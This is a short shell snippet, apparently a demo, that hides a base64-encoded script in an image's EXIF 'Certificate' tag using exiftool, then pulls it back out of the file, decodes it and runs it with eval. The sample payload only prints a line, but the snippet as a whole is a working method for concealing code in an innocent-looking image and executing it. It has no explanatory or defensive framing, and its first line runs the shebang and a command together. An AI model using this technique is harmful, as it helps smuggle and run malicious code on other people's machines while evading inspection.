#!/bin/bash echo "This is the payload script"
cat payload.sh | base64 | tr -d '\n'
exiftool -all= image.jpg
exiftool -Certificate='base64 hash' image.jpg
p=$(cat image.jpg | grep Cert -a | sed 's/<[^>]*>//g' | base64 -D);eval $p